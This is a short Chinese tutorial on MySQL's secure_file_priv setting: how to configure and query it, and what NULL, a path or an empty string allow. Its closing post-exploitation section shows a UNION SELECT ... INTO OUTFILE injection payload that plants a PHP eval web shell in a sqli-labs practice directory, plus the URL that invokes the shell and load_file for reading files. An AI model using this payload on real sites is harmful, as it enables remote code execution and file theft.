secure_file_priv是MySQL中的系統(tǒng)變量，用于限制文件的讀取和寫入。

該參數(shù)的設(shè)置可以通過my.ini(windows版本)/my.cnf(Linux版本)中設(shè)置。

修改完參數(shù)之后，必須重啟數(shù)據(jù)庫才能生效。

啟動MySQL，先查看secure_file_priv的值。

命令：show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ，限制文件的讀取和寫入。

2.secure_file_priv = 文件路徑 ，限制文件的讀取和寫入只能在設(shè)定的文件夾中。

3.secure_file_priv= "", 對文件和讀取和寫入沒有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路徑；

內(nèi)容在文件中是以一行的形式呈現(xiàn)，多行數(shù)據(jù)會出現(xiàn)數(shù)據(jù)保存不全；

dumpfile只能寫一行，并且輸出中不存在任何格式。

2.select  *** into outfile  文件路徑；

內(nèi)容有特殊格式轉(zhuǎn)換，該換行換行，較比dumpfile更加好用；

outfile可以寫入多行數(shù)據(jù)，并且字段和行終止符都可以作為格式輸出。

例如：?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

調(diào)用：url/test.php?123=phpinfo();

3.select  *** load_file （下載文件）

select  load_file(文件路徑);

到此這篇關(guān)于Mysql 中的secure_file_priv參數(shù)設(shè)置的文章就介紹到這了,更多相關(guān)mysql secure_file_priv參數(shù)設(shè)置內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評論